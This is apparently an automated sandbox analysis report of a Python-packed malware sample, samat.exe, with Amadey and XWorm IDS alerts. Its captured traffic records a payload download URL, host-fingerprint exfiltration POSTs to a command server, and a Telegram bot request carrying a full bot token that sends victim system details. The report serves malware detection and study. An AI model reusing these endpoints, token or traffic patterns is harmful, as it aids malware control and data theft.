Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4560 CryptDestroyKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,	8_2_00007FF8B7EB4560
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3D30 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptHashData,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EB3D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBB520 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyList_New,PyEval_SaveThread,CryptEnumKeyIdentifierProperties,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,PyMem_Free,	8_2_00007FF8B7EBB520
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5110 CryptReleaseContext,	8_2_00007FF8B7EB5110
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBD100 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,free,free,	8_2_00007FF8B7EBD100
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B834CD30 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,	8_2_00007FF8B834CD30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8381970 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,	8_2_00007FF8B8381970
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B83AB900 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	8_2_00007FF8B83AB900
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B833F910 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,	8_2_00007FF8B833F910
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8331E6A ERR_new,ERR_set_debug,CRYPTO_clear_free,	8_2_00007FF8B8331E6A
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8331A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	8_2_00007FF8B8331A41
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B833105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,	8_2_00007FF8B833105F
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B837D980 RAND_bytes_ex,CRYPTO_malloc,memset,	8_2_00007FF8B837D980
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B83311DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,	8_2_00007FF8B83311DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8393A60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,	8_2_00007FF8B8393A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8347A60 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,	8_2_00007FF8B8347A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8379A60 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,	8_2_00007FF8B8379A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8373A00 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,	8_2_00007FF8B8373A00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8331A15 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,	8_2_00007FF8B8331A15
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B839BA20 CRYPTO_free,CRYPTO_free,CRYPTO_free,	8_2_00007FF8B839BA20

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose,	7_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose,	8_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF7E12E1874

Source: chrome.exe

Memory has grown: Private usage: 11MB later: 27MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49818
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49880 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50124 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50148 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50146
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50155
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50155 -> 87.120.112.33:8398
Source: Network traffic	Suricata IDS: 2858924 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 87.120.112.33:8398 -> 192.168.2.5:50155
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50179
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:50152 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.43

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.5:49822 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:50104 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
Source: global traffic	HTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008029001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
